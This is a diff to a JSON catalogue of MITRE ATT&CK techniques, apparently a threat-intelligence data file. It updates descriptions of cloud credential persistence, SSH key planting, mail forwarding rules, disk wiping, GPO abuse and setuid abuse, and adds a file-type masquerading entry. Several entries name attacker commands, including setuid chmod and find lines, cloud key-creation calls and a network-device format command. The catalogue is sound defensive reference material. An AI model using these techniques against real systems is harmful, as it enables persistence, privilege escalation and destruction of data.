+ "description": "Adversaries may use utilities to compress and/or encrypt collected data prior to exfiltration. Many utilities include functionalities to compress, encrypt, or otherwise package data into a format that is easier/more secure to transport.\n\nAdversaries may abuse various utilities to compress or encrypt data before exfiltration. Some third party utilities may be preinstalled, such as tar on Linux and macOS or zip on Windows systems. \n\nOn Windows, diantz or makecab may be used to package collected files into a cabinet (.cab) file. diantz may also be used to download and compress files from remote locations (i.e. [Remote Data Staging](https://attack.mitre.org/techniques/T1074/002)).(Citation: diantz.exe_lolbas) xcopy on Windows can copy files and directories with a variety of options. Additionally, adversaries may use [certutil](https://attack.mitre.org/software/S0160) to Base64 encode collected data before exfiltration. \n\nAdversaries may use also third party utilities, such as 7-Zip, WinRAR, and WinZip, to perform similar activities.(Citation: 7zip Homepage)(Citation: WinRAR Homepage)(Citation: WinZip Homepage)",
"meta": {
"external_id": "T1560.001",
"kill_chain": [
@@ -8285,14 +8317,13 @@
"value": "Archive via Utility - T1560.001"
},
{
- "description": "Adversaries may add adversary-controlled credentials to a cloud account to maintain persistent access to victim accounts and instances within the environment.\n\nFor example, adversaries may add credentials for Service Principals and Applications in addition to existing legitimate credentials in Azure AD.(Citation: Microsoft SolarWinds Customer Guidance)(Citation: Blue Cloud of Death)(Citation: Blue Cloud of Death Video) These credentials include both x509 keys and passwords.(Citation: Microsoft SolarWinds Customer Guidance) With sufficient permissions, there are a variety of ways to add credentials including the Azure Portal, Azure command line interface, and Azure or Az PowerShell modules.(Citation: Demystifying Azure AD Service Principals)\n\nIn infrastructure-as-a-service (IaaS) environments, after gaining access through [Cloud Accounts](https://attack.mitre.org/techniques/T1078/004), adversaries may generate or import their own SSH keys using either the CreateKeyPair or ImportKeyPair API in AWS or the gcloud compute os-login ssh-keys add command in GCP.(Citation: GCP SSH Key Add) This allows persistent access to instances within the cloud environment without further usage of the compromised cloud accounts.(Citation: Expel IO Evil in AWS)(Citation: Expel Behind the Scenes)\n\nAdversaries may also use the CreateAccessKey API in AWS or the gcloud iam service-accounts keys create command in GCP to add access keys to an account. If the target account has different permissions from the requesting account, the adversary may also be able to escalate their privileges in the environment (i.e. [Cloud Accounts](https://attack.mitre.org/techniques/T1078/004)).(Citation: Rhino Security Labs AWS Privilege Escalation)",
+ "description": "Adversaries may add adversary-controlled credentials to a cloud account to maintain persistent access to victim accounts and instances within the environment.\n\nFor example, adversaries may add credentials for Service Principals and Applications in addition to existing legitimate credentials in Azure AD.(Citation: Microsoft SolarWinds Customer Guidance)(Citation: Blue Cloud of Death)(Citation: Blue Cloud of Death Video) These credentials include both x509 keys and passwords.(Citation: Microsoft SolarWinds Customer Guidance) With sufficient permissions, there are a variety of ways to add credentials including the Azure Portal, Azure command line interface, and Azure or Az PowerShell modules.(Citation: Demystifying Azure AD Service Principals)\n\nIn infrastructure-as-a-service (IaaS) environments, after gaining access through [Cloud Accounts](https://attack.mitre.org/techniques/T1078/004), adversaries may generate or import their own SSH keys using either the CreateKeyPair or ImportKeyPair API in AWS or the gcloud compute os-login ssh-keys add command in GCP.(Citation: GCP SSH Key Add) This allows persistent access to instances within the cloud environment without further usage of the compromised cloud accounts.(Citation: Expel IO Evil in AWS)(Citation: Expel Behind the Scenes)\n\nAdversaries may also use the CreateAccessKey API in AWS or the gcloud iam service-accounts keys create command in GCP to add access keys to an account. If the target account has different permissions from the requesting account, the adversary may also be able to escalate their privileges in the environment (i.e. [Cloud Accounts](https://attack.mitre.org/techniques/T1078/004)).(Citation: Rhino Security Labs AWS Privilege Escalation)\n\nIn AWS environments, adversaries with the appropriate permissions may also use the `sts:GetFederationToken` API call to create a temporary set of credentials tied to the permissions of the original user account. These credentials may remain valid for the duration of their lifetime even if the original account’s API credentials are deactivated.\n(Citation: Crowdstrike AWS User Federation Persistence)",
"meta": {
"external_id": "T1098.001",
"kill_chain": [
"mitre-attack:persistence"
],
"mitre_data_sources": [
- "Active Directory: Active Directory Object Modification",
"User Account: User Account Modification"
],
"mitre_platforms": [
@@ -8309,6 +8340,7 @@
"https://nedinthecloud.com/2019/07/16/demystifying-azure-ad-service-principals/",
"https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/",
"https://speakerdeck.com/tweekfawkes/blue-cloud-of-death-red-teaming-azure-1",
+ "https://www.crowdstrike.com/blog/how-adversaries-persist-with-aws-user-federation/",
"https://www.youtube.com/watch?v=wQ1CuAPnrLM&feature=youtu.be&t=2815"
]
},
@@ -8465,7 +8497,6 @@
],
"refs": [
"https://attack.mitre.org/techniques/T1550/002",
- "https://capec.mitre.org/data/definitions/644.html",
"https://stealthbits.com/blog/how-to-detect-overpass-the-hash-attacks/"
]
},
@@ -8532,7 +8563,6 @@
"refs": [
"https://attack.mitre.org/techniques/T1056/002",
"https://baesystemsai.blogspot.com/2015/06/new-mac-os-malware-exploits-mackeeper.html",
- "https://capec.mitre.org/data/definitions/659.html",
"https://embracethered.com/blog/posts/2021/spoofing-credential-dialogs/",
"https://enigma0x3.net/2015/01/21/phishing-for-credentials-if-you-want-it-just-ask/",
"https://logrhythm.com/blog/do-you-trust-your-computer/",
@@ -8698,7 +8728,6 @@
"http://defcon.org/images/defcon-22/dc-22-presentations/Campbell/DEFCON-22-Christopher-Campbell-The-Secret-Life-of-Krbtgt.pdf",
"https://adsecurity.org/?p=556",
"https://attack.mitre.org/techniques/T1550/003",
- "https://capec.mitre.org/data/definitions/645.html",
"https://cert.europa.eu/static/WhitePapers/UPDATED%20-%20CERT-EU_Security_Whitepaper_2014-007_Kerberos_Golden_Ticket_Protection_v1_4.pdf",
"https://stealthbits.com/blog/how-to-detect-overpass-the-hash-attacks/"
]
@@ -8730,7 +8759,6 @@
],
"refs": [
"https://attack.mitre.org/techniques/T1056/003",
- "https://capec.mitre.org/data/definitions/569.html",
"https://www.volexity.com/blog/2015/10/07/virtual-private-keylogging-cisco-web-vpns-leveraged-for-access-and-persistence/"
]
},
@@ -8844,8 +8872,7 @@
],
"refs": [
"https://arstechnica.com/security/2016/07/after-hiatus-in-the-wild-mac-backdoors-are-suddenly-back/",
- "https://attack.mitre.org/techniques/T1036/006",
- "https://capec.mitre.org/data/definitions/649.html"
+ "https://attack.mitre.org/techniques/T1036/006"
]
},
"related": [
@@ -8915,6 +8942,36 @@
"uuid": "c071d8c1-3b3a-4f22-9407-ca4e96921069",
"value": "Install Digital Certificate - T1608.003"
},
+ {
+ "description": "Adversaries may masquerade malicious payloads as legitimate files through changes to the payload's formatting, including the file’s signature, extension, and contents. Various file types have a typical standard format, including how they are encoded and organized. For example, a file’s signature (also known as header or magic bytes) is the beginning bytes of a file and is often used to identify the file’s type. For example, the header of a JPEG file, is 0xFF 0xD8 and the file extension is either `.JPE`, `.JPEG` or `.JPG`. \n\nAdversaries may edit the header’s hex code and/or the file extension of a malicious payload in order to bypass file validation checks and/or input sanitization. This behavior is commonly used when payload files are transferred (e.g., [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105)) and stored (e.g., [Upload Malware](https://attack.mitre.org/techniques/T1608/001)) so that adversaries may move their malware without triggering detections. \n\nCommon non-executable file types and extensions, such as text files (`.txt`) and image files (`.jpg`, `.gif`, etc.) may be typically treated as benign. Based on this, adversaries may use a file extension to disguise malware, such as naming a PHP backdoor code with a file name of test.gif. A user may not know that a file is malicious due to the benign appearance and file extension.\n\nPolygot files, which are files that have multiple different file types and that function differently based on the application that will execute them, may also be used to disguise malicious malware and capabilities.(Citation: polygot_icedID)",
+ "meta": {
+ "external_id": "T1036.008",
+ "kill_chain": [
+ "mitre-attack:defense-evasion"
+ ],
+ "mitre_data_sources": [
+ "Command: Command Execution",
+ "File: File Modification"
+ ],
+ "mitre_platforms": [
+ "Linux",
+ "macOS",
+ "Windows"
+ ],
+ "refs": [
+ "https://attack.mitre.org/techniques/T1036/008",
+ "https://unit42.paloaltonetworks.com/polyglot-file-icedid-payload"
+ ]
+ },
+ "related": [
+ {
+ "dest-uuid": "42e8de7b-37b2-4258-905a-6897815e58e0",
+ "type": "subtechnique-of"
+ }
+ ],
+ "uuid": "208884f1-7b83-4473-ac22-4e1cf6c41471",
+ "value": "Masquerade File Type - T1036.008"
+ },
{
"description": "An adversary may add additional roles or permissions to an adversary-controlled cloud account to maintain persistent access to a tenant. For example, adversaries may update IAM policies in cloud-based environments or add a new global administrator in Office 365 environments.(Citation: AWS IAM Policies and Permissions)(Citation: Google Cloud IAM Policies)(Citation: Microsoft Support O365 Add Another Admin, October 2019)(Citation: Microsoft O365 Admin Roles) With sufficient permissions, a compromised account can gain almost unlimited access to data and settings (including the ability to reset the passwords of other admins).(Citation: Expel AWS Attacker)\n(Citation: Microsoft O365 Admin Roles) \n\nThis account modification may immediately follow [Create Account](https://attack.mitre.org/techniques/T1136) or other malicious account activity. Adversaries may also modify existing [Valid Accounts](https://attack.mitre.org/techniques/T1078) that they have compromised. This could lead to privilege escalation, particularly if the roles added allow for lateral movement to additional accounts.\n\nFor example, in Azure AD environments, an adversary with the Application Administrator role can add [Additional Cloud Credentials](https://attack.mitre.org/techniques/T1098/001) to their application's service principal. In doing so the adversary would be able to gain the service principal’s roles and permissions, which may be different from those of the Application Administrator.(Citation: SpecterOps Azure Privilege Escalation) Similarly, in AWS environments, an adversary with appropriate permissions may be able to use the CreatePolicyVersion API to define a new version of an IAM policy or the AttachUserPolicy API to attach an IAM policy with additional or distinct permissions to a compromised user account.(Citation: Rhino Security Labs AWS Privilege Escalation)\n\nSimilarly, an adversary with the Azure AD Global Administrator role can toggle the “Access management for Azure resources” option to gain the ability to assign privileged access to Azure subscriptions and virtual machines to Azure AD users, including themselves.(Citation: Azure AD to AD) ",
"meta": {
@@ -9007,7 +9064,6 @@
],
"refs": [
"https://attack.mitre.org/techniques/T1550/004",
- "https://capec.mitre.org/data/definitions/60.html",
"https://unit42.paloaltonetworks.com/mac-malware-steals-cryptocurrency-exchanges-cookies/",
"https://wunderwuzzi23.github.io/blog/passthecookie.html"
]
@@ -9064,7 +9120,7 @@
"value": "Credential API Hooking - T1056.004"
},
{
- "description": "Adversaries may modify the SSH authorized_keys file to maintain persistence on a victim host. Linux distributions and macOS commonly use key-based authentication to secure the authentication process of SSH sessions for remote management. The authorized_keys file in SSH specifies the SSH keys that can be used for logging into the user account for which the file is configured. This file is usually found in the user's home directory under <user-home>/.ssh/authorized_keys.(Citation: SSH Authorized Keys) Users may edit the system’s SSH config file to modify the directives PubkeyAuthentication and RSAAuthentication to the value “yes” to ensure public key and RSA authentication are enabled. The SSH config file is usually located under /etc/ssh/sshd_config.\n\nAdversaries may modify SSH authorized_keys files directly with scripts or shell commands to add their own adversary-supplied public keys. In cloud environments, adversaries may be able to modify the SSH authorized_keys file of a particular virtual machine via the command line interface or rest API. For example, by using the Google Cloud CLI’s “add-metadata” command an adversary may add SSH keys to a user account.(Citation: Google Cloud Add Metadata)(Citation: Google Cloud Privilege Escalation) Similarly, in Azure, an adversary may update the authorized_keys file of a virtual machine via a PATCH request to the API.(Citation: Azure Update Virtual Machines) This ensures that an adversary possessing the corresponding private key may log in as an existing user via SSH.(Citation: Venafi SSH Key Abuse)(Citation: Cybereason Linux Exim Worm)\n\nWhere authorized_keys files are modified via cloud APIs or command line interfaces, an adversary may achieve privilege escalation on the target virtual machine if they add a key to a higher-privileged user. ",
+ "description": "Adversaries may modify the SSH authorized_keys file to maintain persistence on a victim host. Linux distributions and macOS commonly use key-based authentication to secure the authentication process of SSH sessions for remote management. The authorized_keys file in SSH specifies the SSH keys that can be used for logging into the user account for which the file is configured. This file is usually found in the user's home directory under <user-home>/.ssh/authorized_keys.(Citation: SSH Authorized Keys) Users may edit the system’s SSH config file to modify the directives PubkeyAuthentication and RSAAuthentication to the value “yes” to ensure public key and RSA authentication are enabled. The SSH config file is usually located under /etc/ssh/sshd_config.\n\nAdversaries may modify SSH authorized_keys files directly with scripts or shell commands to add their own adversary-supplied public keys. In cloud environments, adversaries may be able to modify the SSH authorized_keys file of a particular virtual machine via the command line interface or rest API. For example, by using the Google Cloud CLI’s “add-metadata” command an adversary may add SSH keys to a user account.(Citation: Google Cloud Add Metadata)(Citation: Google Cloud Privilege Escalation) Similarly, in Azure, an adversary may update the authorized_keys file of a virtual machine via a PATCH request to the API.(Citation: Azure Update Virtual Machines) This ensures that an adversary possessing the corresponding private key may log in as an existing user via SSH.(Citation: Venafi SSH Key Abuse)(Citation: Cybereason Linux Exim Worm) \n\nWhere authorized_keys files are modified via cloud APIs or command line interfaces, an adversary may achieve privilege escalation on the target virtual machine if they add a key to a higher-privileged user. \n\nSSH keys can also be added to accounts on network devices, such as with the `ip ssh pubkey-chain` [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) command.(Citation: cisco_ip_ssh_pubkey_ch_cmd)",
"meta": {
"external_id": "T1098.004",
"kill_chain": [
@@ -9078,13 +9134,15 @@
"mitre_platforms": [
"Linux",
"macOS",
- "IaaS"
+ "IaaS",
+ "Network"
],
"refs": [
"https://about.gitlab.com/blog/2020/02/12/plundering-gcp-escalating-privileges-in-google-cloud-platform/",
"https://attack.mitre.org/techniques/T1098/004",
"https://cloud.google.com/sdk/gcloud/reference/compute/instances/add-metadata",
"https://docs.microsoft.com/en-us/rest/api/compute/virtual-machines/update",
+ "https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/security/d1/sec-d1-cr-book/sec-cr-i3.html#wp1254331478",
"https://www.cybereason.com/blog/new-pervasive-worm-exploiting-linux-exim-server-vulnerability",
"https://www.ssh.com/ssh/authorized_keys/",
"https://www.venafi.com/blog/growing-abuse-ssh-keys-commodity-malware-campaigns-now-equipped-ssh-capabilities"
@@ -9345,14 +9403,15 @@
"value": "Compiled HTML File - T1218.001"
},
{
- "description": "Adversaries may setup email forwarding rules to collect sensitive information. Adversaries may abuse email-forwarding rules to monitor the activities of a victim, steal information, and further gain intelligence on the victim or the victim’s organization to use as part of further exploits or operations.(Citation: US-CERT TA18-068A 2018) Furthermore, email forwarding rules can allow adversaries to maintain persistent access to victim's emails even after compromised credentials are reset by administrators.(Citation: Pfammatter - Hidden Inbox Rules) Most email clients allow users to create inbox rules for various email functions, including forwarding to a different recipient. These rules may be created through a local email application, a web interface, or by command-line interface. Messages can be forwarded to internal or external recipients, and there are no restrictions limiting the extent of this rule. Administrators may also create forwarding rules for user accounts with the same considerations and outcomes.(Citation: Microsoft Tim McMichael Exchange Mail Forwarding 2)(Citation: Mac Forwarding Rules)\n\nAny user or administrator within the organization (or adversary with valid credentials) can create rules to automatically forward all received messages to another recipient, forward emails to different locations based on the sender, and more. Adversaries may also hide the rule by making use of the Microsoft Messaging API (MAPI) to modify the rule properties, making it hidden and not visible from Outlook, OWA or most Exchange Administration tools.(Citation: Pfammatter - Hidden Inbox Rules)",
+ "description": "Adversaries may setup email forwarding rules to collect sensitive information. Adversaries may abuse email forwarding rules to monitor the activities of a victim, steal information, and further gain intelligence on the victim or the victim’s organization to use as part of further exploits or operations.(Citation: US-CERT TA18-068A 2018) Furthermore, email forwarding rules can allow adversaries to maintain persistent access to victim's emails even after compromised credentials are reset by administrators.(Citation: Pfammatter - Hidden Inbox Rules) Most email clients allow users to create inbox rules for various email functions, including forwarding to a different recipient. These rules may be created through a local email application, a web interface, or by command-line interface. Messages can be forwarded to internal or external recipients, and there are no restrictions limiting the extent of this rule. Administrators may also create forwarding rules for user accounts with the same considerations and outcomes.(Citation: Microsoft Tim McMichael Exchange Mail Forwarding 2)(Citation: Mac Forwarding Rules)\n\nAny user or administrator within the organization (or adversary with valid credentials) can create rules to automatically forward all received messages to another recipient, forward emails to different locations based on the sender, and more. Adversaries may also hide the rule by making use of the Microsoft Messaging API (MAPI) to modify the rule properties, making it hidden and not visible from Outlook, OWA or most Exchange Administration tools.(Citation: Pfammatter - Hidden Inbox Rules)\n\nIn some environments, administrators may be able to enable email forwarding rules that operate organization-wide rather than on individual inboxes. For example, Microsoft Exchange supports transport rules that evaluate all mail an organization receives against user-specified conditions, then performs a user-specified action on mail that adheres to those conditions.(Citation: Microsoft Mail Flow Rules 2023) Adversaries that abuse such features may be able to enable forwarding on all or specific mail an organization receives. ",
"meta": {
"external_id": "T1114.003",
"kill_chain": [
"mitre-attack:collection"
],
"mitre_data_sources": [
- "Application Log: Application Log Content"
+ "Application Log: Application Log Content",
+ "Command: Command Execution"
],
"mitre_platforms": [
"Office 365",
@@ -9365,6 +9424,7 @@
"https://attack.mitre.org/techniques/T1114/003",
"https://blog.compass-security.com/2018/09/hidden-inbox-rules-in-microsoft-exchange/",
"https://blogs.technet.microsoft.com/timmcmic/2015/06/08/exchange-and-office-365-mail-forwarding-2/",
+ "https://learn.microsoft.com/en-us/exchange/security-and-compliance/mail-flow-rules/mail-flow-rules",
"https://support.apple.com/guide/mail/reply-to-forward-or-redirect-emails-mlhlp1010/mac",
"https://www.us-cert.gov/ncas/alerts/TA18-086A"
]
@@ -9555,7 +9615,7 @@
"value": "Security Software Discovery - T1418.001"
},
{
- "description": "Adversaries may erase the contents of storage devices on specific systems or in large numbers in a network to interrupt availability to system and network resources.\n\nAdversaries may partially or completely overwrite the contents of a storage device rendering the data irrecoverable through the storage interface.(Citation: Novetta Blockbuster)(Citation: Novetta Blockbuster Destructive Malware)(Citation: DOJ Lazarus Sony 2018) Instead of wiping specific disk structures or files, adversaries with destructive intent may wipe arbitrary portions of disk content. To wipe disk content, adversaries may acquire direct access to the hard drive in order to overwrite arbitrarily sized portions of disk with random data.(Citation: Novetta Blockbuster Destructive Malware) Adversaries have been observed leveraging third-party drivers like [RawDisk](https://attack.mitre.org/software/S0364) to directly access disk content.(Citation: Novetta Blockbuster)(Citation: Novetta Blockbuster Destructive Malware) This behavior is distinct from [Data Destruction](https://attack.mitre.org/techniques/T1485) because sections of the disk are erased instead of individual files.\n\nTo maximize impact on the target organization in operations where network-wide availability interruption is the goal, malware used for wiping disk content may have worm-like features to propagate across a network by leveraging additional techniques like [Valid Accounts](https://attack.mitre.org/techniques/T1078), [OS Credential Dumping](https://attack.mitre.org/techniques/T1003), and [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002).(Citation: Novetta Blockbuster Destructive Malware)",
+ "description": "Adversaries may erase the contents of storage devices on specific systems or in large numbers in a network to interrupt availability to system and network resources.\n\nAdversaries may partially or completely overwrite the contents of a storage device rendering the data irrecoverable through the storage interface.(Citation: Novetta Blockbuster)(Citation: Novetta Blockbuster Destructive Malware)(Citation: DOJ Lazarus Sony 2018) Instead of wiping specific disk structures or files, adversaries with destructive intent may wipe arbitrary portions of disk content. To wipe disk content, adversaries may acquire direct access to the hard drive in order to overwrite arbitrarily sized portions of disk with random data.(Citation: Novetta Blockbuster Destructive Malware) Adversaries have also been observed leveraging third-party drivers like [RawDisk](https://attack.mitre.org/software/S0364) to directly access disk content.(Citation: Novetta Blockbuster)(Citation: Novetta Blockbuster Destructive Malware) This behavior is distinct from [Data Destruction](https://attack.mitre.org/techniques/T1485) because sections of the disk are erased instead of individual files.\n\nTo maximize impact on the target organization in operations where network-wide availability interruption is the goal, malware used for wiping disk content may have worm-like features to propagate across a network by leveraging additional techniques like [Valid Accounts](https://attack.mitre.org/techniques/T1078), [OS Credential Dumping](https://attack.mitre.org/techniques/T1003), and [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002).(Citation: Novetta Blockbuster Destructive Malware)",
"meta": {
"external_id": "T1561.001",
"kill_chain": [
@@ -9616,7 +9676,6 @@
],
"refs": [
"https://attack.mitre.org/techniques/T1518/001",
- "https://capec.mitre.org/data/definitions/581.html",
"https://docs.aws.amazon.com/AWSEC2/latest/APIReference/API_DescribeSecurityGroups.html",
"https://expel.io/blog/finding-evil-in-aws/"
]
@@ -9713,7 +9772,6 @@
"http://blogs.technet.com/b/srd/archive/2014/05/13/ms14-025-an-update-for-group-policy-preferences.aspx",
"http://carnal0wnage.attackresearch.com/2014/05/mimikatz-against-virtual-machine-memory.html",
"https://attack.mitre.org/techniques/T1552/001",
- "https://capec.mitre.org/data/definitions/639.html",
"https://posts.specterops.io/head-in-the-clouds-bd038bb69e48",
"https://unit42.paloaltonetworks.com/attackers-tactics-and-techniques-in-unsecured-docker-daemons-revealed/",
"https://unit42.paloaltonetworks.com/hildegard-malware-teamtnt/"
@@ -9729,7 +9787,7 @@
"value": "Credentials In Files - T1552.001"
},
{
- "description": "Adversaries may corrupt or wipe the disk data structures on a hard drive necessary to boot a system; targeting specific critical systems or in large numbers in a network to interrupt availability to system and network resources. \n\nAdversaries may attempt to render the system unable to boot by overwriting critical data located in structures such as the master boot record (MBR) or partition table.(Citation: Symantec Shamoon 2012)(Citation: FireEye Shamoon Nov 2016)(Citation: Palo Alto Shamoon Nov 2016)(Citation: Kaspersky StoneDrill 2017)(Citation: Unit 42 Shamoon3 2018) The data contained in disk structures may include the initial executable code for loading an operating system or the location of the file system partitions on disk. If this information is not present, the computer will not be able to load an operating system during the boot process, leaving the computer unavailable. [Disk Structure Wipe](https://attack.mitre.org/techniques/T1561/002) may be performed in isolation, or along with [Disk Content Wipe](https://attack.mitre.org/techniques/T1561/001) if all sectors of a disk are wiped.\n\nTo maximize impact on the target organization, malware designed for destroying disk structures may have worm-like features to propagate across a network by leveraging other techniques like [Valid Accounts](https://attack.mitre.org/techniques/T1078), [OS Credential Dumping](https://attack.mitre.org/techniques/T1003), and [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002).(Citation: Symantec Shamoon 2012)(Citation: FireEye Shamoon Nov 2016)(Citation: Palo Alto Shamoon Nov 2016)(Citation: Kaspersky StoneDrill 2017)",
+ "description": "Adversaries may corrupt or wipe the disk data structures on a hard drive necessary to boot a system; targeting specific critical systems or in large numbers in a network to interrupt availability to system and network resources. \n\nAdversaries may attempt to render the system unable to boot by overwriting critical data located in structures such as the master boot record (MBR) or partition table.(Citation: Symantec Shamoon 2012)(Citation: FireEye Shamoon Nov 2016)(Citation: Palo Alto Shamoon Nov 2016)(Citation: Kaspersky StoneDrill 2017)(Citation: Unit 42 Shamoon3 2018) The data contained in disk structures may include the initial executable code for loading an operating system or the location of the file system partitions on disk. If this information is not present, the computer will not be able to load an operating system during the boot process, leaving the computer unavailable. [Disk Structure Wipe](https://attack.mitre.org/techniques/T1561/002) may be performed in isolation, or along with [Disk Content Wipe](https://attack.mitre.org/techniques/T1561/001) if all sectors of a disk are wiped.\n\nOn a network devices, adversaries may reformat the file system using [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) commands such as `format`.(Citation: format_cmd_cisco)\n\nTo maximize impact on the target organization, malware designed for destroying disk structures may have worm-like features to propagate across a network by leveraging other techniques like [Valid Accounts](https://attack.mitre.org/techniques/T1078), [OS Credential Dumping](https://attack.mitre.org/techniques/T1003), and [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002).(Citation: Symantec Shamoon 2012)(Citation: FireEye Shamoon Nov 2016)(Citation: Palo Alto Shamoon Nov 2016)(Citation: Kaspersky StoneDrill 2017)",
"meta": {
"external_id": "T1561.002",
"kill_chain": [
@@ -9745,7 +9803,8 @@
"mitre_platforms": [
"Linux",
"macOS",
- "Windows"
+ "Windows",
+ "Network"
],
"refs": [
"http://researchcenter.paloaltonetworks.com/2016/11/unit42-shamoon-2-return-disttrack-wiper/",
@@ -9753,6 +9812,7 @@
"https://docs.microsoft.com/sysinternals/downloads/sysmon",
"https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/07180722/Report_Shamoon_StoneDrill_final.pdf",
"https://unit42.paloaltonetworks.com/shamoon-3-targets-oil-gas-organization/",
+ "https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/fundamentals/command/cf_command_ref/F_through_K.html#wp2829794668",
"https://www.fireeye.com/blog/threat-research/2016/11/fireeye_respondsto.html",
"https://www.symantec.com/connect/blogs/shamoon-attacks"
]
@@ -9961,7 +10021,7 @@
"value": "Domain Generation Algorithms - T1637.001"
},
{
- "description": "Adversaries may modify Group Policy Objects (GPOs) to subvert the intended discretionary access controls for a domain, usually with the intention of escalating privileges on the domain. Group policy allows for centralized management of user and computer settings in Active Directory (AD). GPOs are containers for group policy settings made up of files stored within a predicable network path \\\\<DOMAIN>\\SYSVOL\\<DOMAIN>\\Policies\\.(Citation: TechNet Group Policy Basics)(Citation: ADSecurity GPO Persistence 2016) \n\nLike other objects in AD, GPOs have access controls associated with them. By default all user accounts in the domain have permission to read GPOs. It is possible to delegate GPO access control permissions, e.g. write access, to specific users or groups in the domain.\n\nMalicious GPO modifications can be used to implement many other malicious behaviors such as [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053), [Disable or Modify Tools](https://attack.mitre.org/techniques/T1562/001), [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105), [Create Account](https://attack.mitre.org/techniques/T1136), [Service Execution](https://attack.mitre.org/techniques/T1569/002), and more.(Citation: ADSecurity GPO Persistence 2016)(Citation: Wald0 Guide to GPOs)(Citation: Harmj0y Abusing GPO Permissions)(Citation: Mandiant M Trends 2016)(Citation: Microsoft Hacking Team Breach) Since GPOs can control so many user and machine settings in the AD environment, there are a great number of potential attacks that can stem from this GPO abuse.(Citation: Wald0 Guide to GPOs)\n\nFor example, publicly available scripts such as New-GPOImmediateTask can be leveraged to automate the creation of a malicious [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053) by modifying GPO settings, in this case modifying <GPO_PATH>\\Machine\\Preferences\\ScheduledTasks\\ScheduledTasks.xml.(Citation: Wald0 Guide to GPOs)(Citation: Harmj0y Abusing GPO Permissions) In some cases an adversary might modify specific user rights like SeEnableDelegationPrivilege, set in <GPO_PATH>\\MACHINE\\Microsoft\\Windows NT\\SecEdit\\GptTmpl.inf, to achieve a subtle AD backdoor with complete control of the domain because the user account under the adversary's control would then be able to modify GPOs.(Citation: Harmj0y SeEnableDelegationPrivilege Right)",
+ "description": "Adversaries may modify Group Policy Objects (GPOs) to subvert the intended discretionary access controls for a domain, usually with the intention of escalating privileges on the domain. Group policy allows for centralized management of user and computer settings in Active Directory (AD). GPOs are containers for group policy settings made up of files stored within a predictable network path `\\\\SYSVOL\\\\Policies\\`.(Citation: TechNet Group Policy Basics)(Citation: ADSecurity GPO Persistence 2016) \n\nLike other objects in AD, GPOs have access controls associated with them. By default all user accounts in the domain have permission to read GPOs. It is possible to delegate GPO access control permissions, e.g. write access, to specific users or groups in the domain.\n\nMalicious GPO modifications can be used to implement many other malicious behaviors such as [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053), [Disable or Modify Tools](https://attack.mitre.org/techniques/T1562/001), [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105), [Create Account](https://attack.mitre.org/techniques/T1136), [Service Execution](https://attack.mitre.org/techniques/T1569/002), and more.(Citation: ADSecurity GPO Persistence 2016)(Citation: Wald0 Guide to GPOs)(Citation: Harmj0y Abusing GPO Permissions)(Citation: Mandiant M Trends 2016)(Citation: Microsoft Hacking Team Breach) Since GPOs can control so many user and machine settings in the AD environment, there are a great number of potential attacks that can stem from this GPO abuse.(Citation: Wald0 Guide to GPOs)\n\nFor example, publicly available scripts such as New-GPOImmediateTask can be leveraged to automate the creation of a malicious [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053) by modifying GPO settings, in this case modifying <GPO_PATH>\\Machine\\Preferences\\ScheduledTasks\\ScheduledTasks.xml.(Citation: Wald0 Guide to GPOs)(Citation: Harmj0y Abusing GPO Permissions) In some cases an adversary might modify specific user rights like SeEnableDelegationPrivilege, set in <GPO_PATH>\\MACHINE\\Microsoft\\Windows NT\\SecEdit\\GptTmpl.inf, to achieve a subtle AD backdoor with complete control of the domain because the user account under the adversary's control would then be able to modify GPOs.(Citation: Harmj0y SeEnableDelegationPrivilege Right)",
"meta": {
"external_id": "T1484.001",
"kill_chain": [
@@ -10030,7 +10090,7 @@
"value": "Process Argument Spoofing - T1564.010"
},
{
- "description": "An adversary may abuse configurations where an application has the setuid or setgid bits set in order to get code running in a different (and possibly more privileged) user’s context. On Linux or macOS, when the setuid or setgid bits are set for an application binary, the application will run with the privileges of the owning user or group respectively.(Citation: setuid man page) Normally an application is run in the current user’s context, regardless of which user or group owns the application. However, there are instances where programs need to be executed in an elevated context to function properly, but the user running them may not have the specific required privileges.\n\nInstead of creating an entry in the sudoers file, which must be done by root, any user can specify the setuid or setgid flag to be set for their own applications (i.e. [Linux and Mac File and Directory Permissions Modification](https://attack.mitre.org/techniques/T1222/002)). The chmod command can set these bits with bitmasking, chmod 4777 [file] or via shorthand naming, chmod u+s [file]. This will enable the setuid bit. To enable the setgit bit, chmod 2775 and chmod g+s can be used.\n\nAdversaries can use this mechanism on their own malware to make sure they're able to execute in elevated contexts in the future.(Citation: OSX Keydnap malware) This abuse is often part of a \"shell escape\" or other actions to bypass an execution environment with restricted permissions.\n\nAlternatively, adversaries may choose to find and target vulnerable binaries with the setuid or setgid bits already enabled (i.e. [File and Directory Discovery](https://attack.mitre.org/techniques/T1083)). The setuid and setguid bits are indicated with an \"s\" instead of an \"x\" when viewing a file's attributes via ls -l. The find command can also be used to search for such files. For example, find / -perm +4000 2>/dev/null can be used to find files with setuid set and find / -perm +2000 2>/dev/null may be used for setgid. Binaries that have these bits set may then be abused by adversaries.(Citation: GTFOBins Suid)",
